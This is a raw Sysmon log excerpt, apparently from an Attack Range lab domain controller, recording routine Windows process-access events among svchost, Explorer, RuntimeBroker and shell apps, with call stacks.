07:51:42.226{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.211{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.211{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.211{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.211{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.211{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.211{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.211{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.211{466BC892-32D3-60E8-770B-00000000CF01}63567856C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.211{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.211{466BC892-32D3-60E8-770B-00000000CF01}63567856C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.211{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57ad5|C:\Windows\System32\TwinUI.dll+37578|C:\Windows\System32\TwinUI.dll+37498|C:\Windows\System32\TwinUI.dll+388e3|C:\Windows\System32\TwinUI.dll+36ebd|C:\Windows\System32\TwinUI.dll+36cc1|C:\Windows\System32\TwinUI.dll+10923d|C:\Windows\System32\TwinUI.dll+d20cf|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.211{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57ad5|C:\Windows\System32\TwinUI.dll+375e0|C:\Windows\System32\TwinUI.dll+37485|C:\Windows\System32\TwinUI.dll+388e3|C:\Windows\System32\TwinUI.dll+36ebd|C:\Windows\System32\TwinUI.dll+36cc1|C:\Windows\System32\TwinUI.dll+10923d|C:\Windows\System32\TwinUI.dll+d20cf|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807483Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:43.180{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFE6D5E62B9597D2A2B11FA7097C0AA0,SHA256=32FED872F9FD78E34CF663234803E4ED4C67FCB72CC8A5FE7325B8DF0A4F5309,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.867{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.863{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.863{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.839{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.839{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.839{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001048484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.839{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\R